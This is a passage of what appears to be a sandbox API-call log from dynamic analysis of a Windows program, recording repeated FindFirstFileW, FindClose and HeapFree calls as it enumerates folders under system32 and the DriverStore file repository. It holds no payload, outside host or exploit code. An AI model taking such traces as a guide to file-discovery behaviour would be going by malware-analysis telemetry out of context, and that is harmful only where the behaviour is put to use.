ftLastWriteTime.dwLowDateTime=0x8cc4abd3, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x44e188 [0027.812] FindClose (in: hFindFile=0x44e188 | out: hFindFile=0x44e188) returned 1 [0027.812] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45b4c0 | out: hHeap=0x420000) returned 1 [0027.817] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\da-DK\\*", lpFindFileData=0x45b4c0 | out: lpFindFileData=0x45b4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e088, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x8fab5928, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x8fab5928, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x44e188 [0027.823] FindClose (in: hFindFile=0x44e188 | out: hFindFile=0x44e188) returned 1 [0027.824] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45b4c0 | out: hHeap=0x420000) returned 1 [0027.824] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\de-DE\\*", lpFindFileData=0x45b4c0 | out: lpFindFileData=0x45b4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e088, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x2737b7c, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0x2737b7c, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x44e188 [0027.843] FindClose (in: hFindFile=0x44e188 | out: hFindFile=0x44e188) returned 1 [0027.843] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45b4c0 | out: hHeap=0x420000) returned 1 [0027.843] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\Dism\\*", lpFindFileData=0x45bcb0 | out: lpFindFileData=0x45bcb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf441e2, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x1e52f2f2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e52f2f2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x44e188 [0027.845] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\Dism\\en-US\\*", lpFindFileData=0x45c128 | out: lpFindFileData=0x45c128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e52f2f2, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a37f89, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e5555ab, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45c380 [0027.848] FindClose (in: hFindFile=0x45c380 | out: hFindFile=0x45c380) returned 1 [0027.849] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45c128 | out: hHeap=0x420000) returned 1 [0027.849] FindClose (in: hFindFile=0x44e188 | out: hFindFile=0x44e188) returned 1 [0027.849] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45bcb0 | out: hHeap=0x420000) returned 1 [0027.850] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\drivers\\*", lpFindFileData=0x45c2a8 | out: lpFindFileData=0x45c2a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf441e2, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x1e9ce759, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9ce759, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x44e188 [0027.851] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\drivers\\en-US\\*", lpFindFileData=0x4687d0 | out: lpFindFileData=0x4687d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e9ce759, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22952f33, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9f4a12, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45c500 [0027.851] FindClose (in: hFindFile=0x45c500 | out: hFindFile=0x45c500) returned 1 [0027.851] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4687d0 | out: hHeap=0x420000) returned 1 [0027.851] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\drivers\\UMDF\\*", lpFindFileData=0x4687d0 | out: lpFindFileData=0x4687d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e9ce759, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1e9ce759, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9ce759, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45c500 [0027.852] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\drivers\\UMDF\\en-US\\*", lpFindFileData=0x469a30 | out: lpFindFileData=0x469a30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e9ce759, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22894196, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9ce759, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45c540 [0027.852] FindClose (in: hFindFile=0x45c540 | out: hFindFile=0x45c540) returned 1 [0027.852] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x469a30 | out: hHeap=0x420000) returned 1 [0027.852] FindClose (in: hFindFile=0x45c500 | out: hFindFile=0x45c500) returned 1 [0027.852] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4687d0 | out: hHeap=0x420000) returned 1 [0027.852] FindClose (in: hFindFile=0x44e188 | out: hFindFile=0x44e188) returned 1 [0027.852] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45c2a8 | out: hHeap=0x420000) returned 1 [0027.852] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\*", lpFindFileData=0x45c2a8 | out: lpFindFileData=0x45c2a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfee8988a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x8421deb9, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8421deb9, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x44e188 [0027.853] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\en-US\\*", lpFindFileData=0x4687d0 | out: lpFindFileData=0x4687d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1dc3cf96, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x98858ddc, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x98858ddc, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45c500 [0027.859] FindClose (in: hFindFile=0x45c500 | out: hFindFile=0x45c500) returned 1 [0027.859] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4687d0 | out: hHeap=0x420000) returned 1 [0027.859] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\*", lpFindFileData=0x4687d0 | out: lpFindFileData=0x4687d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfee8988a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x841f7c4a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x833f5788, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45c500 [0027.863] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\1394.inf_amd64_neutral_0b11366838152a76\\*", lpFindFileData=0x469a30 | out: lpFindFileData=0x469a30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x392f7a54, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3bdf6803, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3bdf6803, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45c540 [0027.925] FindClose (in: hFindFile=0x45c540 | out: hFindFile=0x45c540) returned 1 [0027.925] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x469a30 | out: hHeap=0x420000) returned 1 [0027.925] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\61883.inf_amd64_neutral_a64d66bac757464c\\*", lpFindFileData=0x469a30 | out: lpFindFileData=0x469a30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3da54f2d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x607ef4b0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x607ef4b0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45c540 [0027.927] FindClose (in: hFindFile=0x45c540 | out: hFindFile=0x45c540) returned 1 [0027.927] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x469a30 | out: hHeap=0x420000) returned 1 [0027.927] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\acpi.inf_amd64_neutral_aed2e7a487803437\\*", lpFindFileData=0x469a30 | out: lpFindFileData=0x469a30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39b4c763, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x46150ef0, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x46150ef0, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45c540 [0027.928] FindClose (in: hFindFile=0x45c540 | out: hFindFile=0x45c540) returned 1 [0027.929] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x469a30 | out: hHeap=0x420000) returned 1 [0027.929] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\acpipmi.inf_amd64_neutral_256ad642985694b3\\*", lpFindFileData=0x469a30 | out: lpFindFileData=0x469a30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x385b9fdb, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3bb22dde, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3bb22dde, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45c540 [0027.930] FindClose (in: hFindFile=0x45c540 | out: hFindFile=0x45c540) returned 1 [0027.930] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x469a30 | out: hHeap=0x420000) returned 1 [0027.930] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\adp94xx.inf_amd64_neutral_4928c8870f6a1577\\*", lpFindFileData=0x469a30 | out: lpFindFileData=0x469a30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42198250, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61cc3556, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61cc3556, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45c540 [0027.930] FindClose (in: hFindFile=0x45c540 | out: hFindFile=0x45c540) returned 1 [0027.930] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x469a30 | out: hHeap=0x420000) returned 1 [0027.930] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\adpahci.inf_amd64_neutral_b082e95ec9f8c3f9\\*", lpFindFileData=0x469a30 | out: lpFindFileData=0x469a30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x422307d1, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61cc3556, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61cc3556, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45c540 [0027.931] FindClose (in: hFindFile=0x45c540 | out: hFindFile=0x45c540) returned 1 [0027.931] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x469a30 | out: hHeap=0x420000) returned 1 [0027.931] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\adpu320.inf_amd64_neutral_4ea3d42a9839982a\\*", lpFindFileData=0x469a30 | out: lpFindFileData=0x469a30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x422eeeb2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61ce96b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61ce96b6, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45c540 [0027.931] FindClose (in: hFindFile=0x45c540 | out: hFindFile=0x45c540) returned 1 [0027.931] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x469a30 | out: hHeap=0x420000) returned 1 [0027.931] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\af9035bda.inf_amd64_neutral_aa11aa34552d1d4d\\*", lpFindFileData=0x469a30 | out: lpFindFileData=0x469a30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x474c2389, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x660e6b94, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x660e6b94, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45c540 [0027.931] FindClose (in: hFindFile=0x45c540 | out: hFindFile=0x45c540) returned 1 [0027.932] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x469a30 | out: hHeap=0x420000) returned 1 [0027.932] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\agp.inf_amd64_neutral_22cdceb61fbafb43\\*", lpFindFileData=0x469a30 | out: lpFindFileData=0x469a30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4290871e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61e1a1b9, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61e1a1b9, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45c540 [0027.932] FindClose (in: hFindFile=0x45c540 | out: hFindFile=0x45c540) returned 1 [0027.932] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x469a30 | out: hHeap=0x420000) returned 1 [0027.932] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\amdsata.inf_amd64_neutral_67db50590108ebd9\\*", lpFindFileData=0x469a30 | out: lpFindFileData=0x469a30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x395cb479, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3bedb045, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3bedb045, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45c540 [0027.933] FindClose (in: hFindFile=0x45c540 | out: hFindFile=0x45c540) returned 1 [0027.933] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x469a30 | out: hHeap=0x420000) returned 1 [0027.933] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\amdsbs.inf_amd64_neutral_5cae6933bef20aa8\\*", lpFindFileData=0x469a30 | out: lpFindFileData=0x469a30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41eea98b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61ad4373, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61ad4373, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45c540 [0027.934] FindClose (in: hFindFile=0x45c540 | out: hFindFile=0x45c540) returned 1 [0027.934] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x469a30 | out: hHeap=0x420000) returned 1 [0027.934] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\angel264.inf_amd64_neutral_04b54b6322607cce\\*", lpFindFileData=0x469a30 | out: lpFindFileData=0x469a30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4662dcae, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65d087cc, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65d087cc, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45c540 [0027.934] FindClose (in: hFindFile=0x45c540 | out: hFindFile=0x45c540) returned 1 [0027.934] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x469a30 | out: hHeap=0x420000) returned 1 [0027.934] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\angel64.inf_amd64_neutral_6bed16c93db1ccf3\\*", lpFindFileData=0x469a30 | out: lpFindFileData=0x469a30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x466ec390, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65d2e92d, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65d2e92d, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45c540 [0027.935] FindClose (in: hFindFile=0x45c540 | out: hFindFile=0x45c540) returned 1 [0027.935] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x469a30 | out: hHeap=0x420000) returned 1 [0027.935] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\angelu64.inf_amd64_neutral_3d6079dd78127f5e\\*", lpFindFileData=0x469a30 | out: lpFindFileData=0x469a30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46784911, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65d54a8d, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65d54a8d, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45c540 [0027.935] FindClose (in: hFindFile=0x45c540 | out: hFindFile=0x45c540) returned 1 [0027.935] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x469a30 | out: hHeap=0x420000) returned 1 [0027.935] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\arc.inf_amd64_neutral_11b52dec8e94d9aa\\*", lpFindFileData=0x469a30 | out: lpFindFileData=0x469a30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x423f9854, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61ce96b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61ce96b6, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45c540 [0027.936] FindClose (in: hFindFile=0x45c540 | out: hFindFile=0x45c540) returned 1 [0027.936] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x469a30 | out: hHeap=0x420000) returned 1 [0027.936] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\arcsas.inf_amd64_neutral_c763887719bed95d\\*", lpFindFileData=0x469a30 | out: lpFindFileData=0x469a30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x424b7f36, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61d0f817, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61d0f817, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45c540 [0027.936] FindClose (in: hFindFile=0x45c540 | out: hFindFile=0x45c540) returned 1 [0027.937] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x469a30 | out: hHeap=0x420000) returned 1 [0027.937] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\atiilhag.inf_amd64_neutral_0a660e899f5038a2\\*", lpFindFileData=0x469a30 | out: lpFindFileData=0x469a30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37d8b42c, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3b8e793a, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3b8e793a, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45c540 [0027.939] FindClose (in: hFindFile=0x45c540 | out: hFindFile=0x45c540) returned 1 [0027.939] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x469a30 | out: hHeap=0x420000) returned 1 [0027.939] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\atiriol6.inf_amd64_neutral_bde34ad5722cca75\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x459d4a78, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x659c2986, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x659c2986, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0027.940] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0027.940] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0027.940] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\avc.inf_amd64_neutral_3ef33c750e6308ce\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ebbd02d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60b352f6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60b352f6, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0027.940] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0027.940] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0027.940] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\averfx2hbh826d_noaverir_x64.inf_amd64_neutral_da2ba9e8a30dad14\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45a6cff9, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x659e8ae7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x659e8ae7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0027.962] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0027.963] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0027.963] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\averfx2hbtv_x64.inf_amd64_neutral_7216b6fb23536c40\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45b2b6da, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65a34da7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65a34da7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0027.965] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0027.965] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0027.969] 